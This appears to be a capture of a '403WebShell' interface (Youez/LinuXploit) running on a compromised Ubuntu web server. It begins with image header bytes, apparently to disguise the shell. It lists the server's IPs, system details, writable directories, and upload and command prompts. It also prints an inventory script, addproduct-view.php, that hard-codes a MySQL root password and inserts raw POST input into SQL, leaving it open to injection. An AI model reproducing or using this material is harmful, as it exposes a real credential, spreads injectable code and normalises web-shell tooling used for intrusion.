����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����403WebShell
403Webshell
Server IP : 74.208.127.88  /  Your IP : 3.148.221.78
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/t/sae/appsae/core/app/view/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/t/sae/appsae/core/app/view/addproduct-view.php

<?php
if(count($_POST)>0){
//alta de product en tabla m_item
  $max_item = ProductData::getByIdMax();
    //producto ultimo
 $product_item= $max_item[0]->id;
 $product_item =++ $product_item;
 
  $id_item =  $product_item;
  $barcode = $_POST["barcode"];
  $item_name = $_POST["name"];
  $price = $_POST["price_out"];
  $stock = $_POST["q"];
  
  $unit = $_POST["presentation"];
  
  //VALORES DE PAQUETE
	$qy= $_POST["qy"];
	echo $product_id = $_POST["product_id"];
	$type= $_POST["is_service"];

?>  


<?php

//GUARDAMOS LOS VALORES DE LOS PRODUCTOS EN LA TABLA operation
				//registramos los productos 
				$servername = "localhost";
				$database = "sae";
				$username = "root";
				$password = "Hues198020";
				// Create connection
				$conn = mysqli_connect($servername, $username, $password, $database);
				// Check connection
				
				if (!$conn) {
					  die("Connection failed: " . mysqli_connect_error());
				}
					
				//agregamos el codigo alterno desde description en tabla product  a tabla m_item
				$alterno = $_POST["description"];
				
						$sql = "INSERT INTO m_item (id_item,item_name,barcode,alterno,stock,price,unit,type_prod) VALUES ('$id_item','$item_name','$barcode','$alterno','$stock','$price','$unit', '$type')";
						$result3 = mysqli_query($conn, $sql);
							
						  
					mysqli_close($conn);
?> 


<?php 

//ALTA DE PRODUCTOS EN TABLA product

  $product = new ProductData();
  
 
  $product->barcode = $_POST["barcode"];
  $product->name = $_POST["name"];
  $product->price_in = $_POST["price_in"];
  $product->price_out = $_POST["price_out"];
  $product->iva = $_POST["iva"];
  $product->unit = $_POST["unit"];
  $product->description = $_POST["description"];
  $product->presentation = $_POST["presentation"];
  //$product->inventary_min = $_POST["inventary_min"];
  
  
  
  $category_id="NULL";
  if($_POST["category_id"]!=""){ $category_id=$_POST["category_id"];}
  $inventary_min="\"\"";
  if($_POST["inventary_min"]!=""){ $inventary_min=$_POST["inventary_min"];}

  $product->category_id=$category_id;
  $product->inventary_min=$inventary_min;
  $product->user_id = $_SESSION["user_id"];
  $product->is_service = $_POST["is_service"];
   //paquete valores
	 $product->product_children = $_POST["product_id"];
	 $product->qy = $_POST["qy"];
  ////////////

  if(isset($_FILES["image"])){
    $image = new Upload($_FILES["image"]);
    if($image->uploaded){
      $image->Process("storage/products/");
      if($image->processed){
        $product->image = $image->file_dst_name;
        $prod = $product->add_with_image();
      }
    }else{

  $prod= $product->add();
    }
  }
  else{
  $prod= $product->add();

  }




if($_POST["q"]!="" || $_POST["q"]!="0"){
 $op = new OperationData2();
 $op->product_id = $prod[1] ;
 $op->stock_id = StockData::getPrincipal()->id;
 $op->operation_type_id=OperationTypeData::getByName("entrada")->id;
 $op->price_in =$_POST["price_in"];
 $op->price_out= $_POST["price_out"];
 $op->q= $_POST["q"];
 $op->re_id="NULL";
$op->is_oficial=1;
$op->add();
}

print "<script>alert('Registro Agregado');</script>";
print "<script>window.location='index.php?view=newproduct';</script>";


}


?>

Youez - 2016 - github.com/yon3zu
LinuXploit